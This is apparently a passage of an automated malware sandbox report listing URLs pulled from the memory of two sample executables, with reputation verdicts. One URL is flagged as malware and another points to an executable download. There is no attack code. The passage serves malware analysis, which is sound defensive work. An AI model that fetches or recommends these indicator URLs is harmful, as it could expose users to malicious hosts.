                                                                                                                                                                                                                                      https://www.pwd.org/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581046639.0000000005120000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.660330764.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.657456141.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669959249.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?vernhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzanhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://www.com-sit.com/wp-content/uploads/elementor/css/post-2274.css?ver=1685626299nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterrannhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://pohlfood.com/comments/feed/nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://www.com-sit.com/testhouse/nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.cssnhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://www.aevga.com/nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530679965.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.653416069.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://www.myropcb.com/services-capabilities/pcb-restoration/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LnhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://gmpg.org/xfn/11nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://www.cloudflare.com/5xx-error-landingnhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539573838.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652811266.0000000003950000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.642975040.0000000008680000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.643655921.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.652144923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.646765742.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      http://www.myropcb.com/services-capabilities/stencil/nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, 